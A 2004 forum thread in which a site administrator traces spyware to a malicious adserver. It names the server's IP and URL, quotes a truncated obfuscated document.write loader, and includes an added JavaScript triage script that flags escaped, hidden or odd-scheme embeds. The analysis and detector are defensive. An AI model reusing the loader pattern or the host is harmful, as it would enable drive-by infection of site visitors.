Steven P. (Administrators) - Posted April 21, 2004

OK, first off I want to thank Adster. We had some pretty heated discussion on the method of his postings, but I am now convinced he was helping, and he did. Here's what we found out:

I got the PM from Adster and he is correct that an adserver is loading spyware on members' PCs. I can't, however, trace the IP to a single advertiser. The IP is 69.50.139.61 and the URL is 69.50.139.61/hp1/hp1.htm (URL disabled, don't access it on an unprotected PC please). It contains JavaScript:

    <!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->
    <script type="text/javascript">document.write('…')</script>

If you browse to the root folders you get the message:

    This is an adserver. Please contact advertisers directly

So I think we can safely say this does come from one of our advertisers. I have blocked the IP in cPanel. A WHOIS returns very little information:

    NationalNet, Inc. NATL-MACH10-NET (NET-69-50-128-0-1) 69.50.128.0 - 69.50.143.255
    OMEGABYTE Computer Corporation MACH10-OMEGA1 (NET-69-50-139-0-1) 69.50.139.0 - 69.50.139.127

    # ARIN WHOIS database, last updated 2004-04-20 20:01
    # Enter ? for additional hints on searching ARIN's WHOIS database.

And now for the bad news: http://www.google.nl/search?num=20&hl=en&i...Inc&btnG=Search

NationalNet Inc is a large adult hosting company, so this makes me wonder what they are doing with our webviews and why they are involved with one of our ad companies!

As a result we have disabled ALL 468x60 ads and become a member of Google AdSense (which are now displaying all 468x60 ads on Neowin). We can be sure the ads they deliver will not attempt to load spyware on your PC. The intelliText on the main page, AdSquares and towers remain (also not on the forums anyway). Google AdSense also has the option to deliver feedback if you click the Ads by Google link.

I want to thank everyone who helped us get to the bottom of this. The only negative side to this is that we couldn't find out which advertiser controls that IP (all our advertisers deny being involved with spyware).

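One way to inspect a `document.write('\u…')` wrapper like the one quoted in the post above without loading it in a browser, as an added example that is not part of the original thread: the escapes are decoded as text only and the decoded markup is checked against a few heuristics. The function names, finding labels and the sample input (constructed, with a harmless `example-scheme:` placeholder) are assumptions made for this illustration.

```javascript
// Added example: static triage of a document.write('\uXXXX...') wrapper.
// Nothing is evaluated; escapes are decoded as plain text only.

// Decode \uXXXX and \xXX escapes without eval() or Function().
function decodeJsEscapes(s) {
  return s.replace(/\\u([0-9a-f]{4})|\\x([0-9a-f]{2})/gi,
    (_, u, x) => String.fromCharCode(parseInt(u || x, 16)));
}

// Decode numeric character references such as &#109; or &#x6d;.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|\d+);/gi, (whole, n) => {
    const cp = /^x/i.test(n) ? parseInt(n.slice(1), 16) : parseInt(n, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : whole;
  });
}

// Return the quoted string literal passed to each document.write(...) call.
function extractWrites(source) {
  const re = /document\.write\(\s*(['"])((?:\\.|(?!\1)[^\\])*)\1\s*\)/g;
  return [...source.matchAll(re)].map(m => m[2]);
}

// Heuristic labels (assumptions for this example, not a complete rule set).
function triage(source) {
  const findings = [];
  for (const literal of extractWrites(source)) {
    const html = decodeNumericEntities(decodeJsEscapes(literal));
    const escapedChars = (literal.match(/\\u[0-9a-f]{4}/gi) || []).length * 6;
    if (literal.length && escapedChars / literal.length > 0.8)
      findings.push('mostly-escaped-literal');
    if (/style\s*=\s*["'][^"']*display\s*:\s*none/i.test(html))
      findings.push('hidden-element');
    const embed = /<(object|iframe|embed)\b[^>]*\b(?:data|src)\s*=\s*["']?([a-z][a-z0-9+.-]*):/gi;
    for (const m of html.matchAll(embed))
      if (!/^https?$/i.test(m[2]))
        findings.push(`${m[1].toLowerCase()}-non-http-scheme:${m[2].toLowerCase()}`);
    if (/document\.write\s*\(/i.test(html)) findings.push('nested-document.write');
  }
  return findings;
}

// Constructed, harmless sample: markup escaped the same way, placeholder scheme.
const toEscapes = s =>
  [...s].map(c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0')).join('');
const SAMPLE_HTML = '<div style="display:none"><object data="&#101;xample-scheme:placeholder" type="text/plain"></object></div>';
const SAMPLE = `<script>document.write('${toEscapes(SAMPLE_HTML)}')</script>`;

console.log(triage(SAMPLE));
```

Run it with Node against a saved copy of the page source; the entity decoding matters because a scheme name can be hidden behind a numeric character reference that a plain string search would miss.
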
Japlabot - Posted April 22, 2004

So are the Google ads per view or per click? And do they pay the same/more/less? I definitely hope that it's enough to pay for your costs; otherwise, if you are losing money, I would do something to help get some more money into Neowin.

aem4162 - Posted April 22, 2004

What, if anything, do we do to get the stuff off our computers? I'm gonna run Ad-Aware and Spybot....

Ivand - Posted April 22, 2004

I like the changes Neobond, I like more the no graphical ads by Google

Chode - Posted April 22, 2004

Great changes (Y) I've never seen a problem with Google's ads

kongit - Posted April 22, 2004

(Y) great. ps. this thread is insanely wide.

Wiser87 - Posted April 22, 2004

> (Y) great. ps. this thread is insanely wide.

Hahahahaha! I was wondering when someone was going to mention that! :D :laugh:

Steven P. (Administrators) - Posted April 22, 2004

> (Y) great. ps. this thread is insanely wide.

Not for me it isn't (using IE6)

calidude - Posted April 22, 2004

Not insanely wide for me either...

Japlabot - Posted April 22, 2004

It's screwed up for me in IE6, but worse in the fox.

Oblivion - Posted April 22, 2004

Nice Move Neobond (Y)

Si (Veteran) - Posted April 22, 2004

Wow, Neobond is romping through the site maintenance at the minute! Thanks for your hard work! (Y)

Also, this thread is very wide (using Firefox 0.8+)

Rell - Posted April 22, 2004

> ps. this thread is insanely wide.

Description of post should say... "Warning: Some users of alternative browsers (Firefox) may experience a wide load." :rofl:

tomwarren (Veteran) - Posted April 22, 2004

Good to hear :) Bloody advertising companies, any way to make money - pssh.

Toxikk (Veteran) - Posted April 22, 2004

Woohoo! Finally got to the bottom of that whole mess. Thanks! The new ones look great.

Frank - Posted April 22, 2004

For the people having problems with the thread being wide, try changing your resolution. Mine was fine until SOMEONE posted a pic. :D

Adster - Posted April 22, 2004

It's me again! :p I just wanted to thank Neobond for nipping this thing before the problem became more widespread. He's a great Admin. Thumbs up to you! (Y)

On a side note, one more thing about that trojan that I didn't realize earlier. It replaces wmplayer.exe with an installation file so when you try to open a video or audio file that opens in Windows Media Player, it downloads more spyware instead. To fix that, run wm_setup.exe in the same directory (usually C:\Program Files\Windows Media Player) and it will re-download the original wmplayer.exe file.

Once again, thanks Neobond!

Zetter - Posted April 22, 2004

The Google ads may not be as relevant as they could be...

    Longhorn Texas
    Compare and buy it on eBay. Thousands of new & used items!

Methinks keywords should be re-thought

Steven P. (Administrators) - Posted April 22, 2004

> The Google ads may not be as relevant as they could be...
> Longhorn Texas
> Compare and buy it on eBay. Thousands of new & used items!
> Methinks keywords should be re-thought

I thought I asked people not to whine about the ads. How many times do I have to say that we need them? Do you think I want them?

vip - Posted April 22, 2004

Wow, this thread is like WHOA wide ....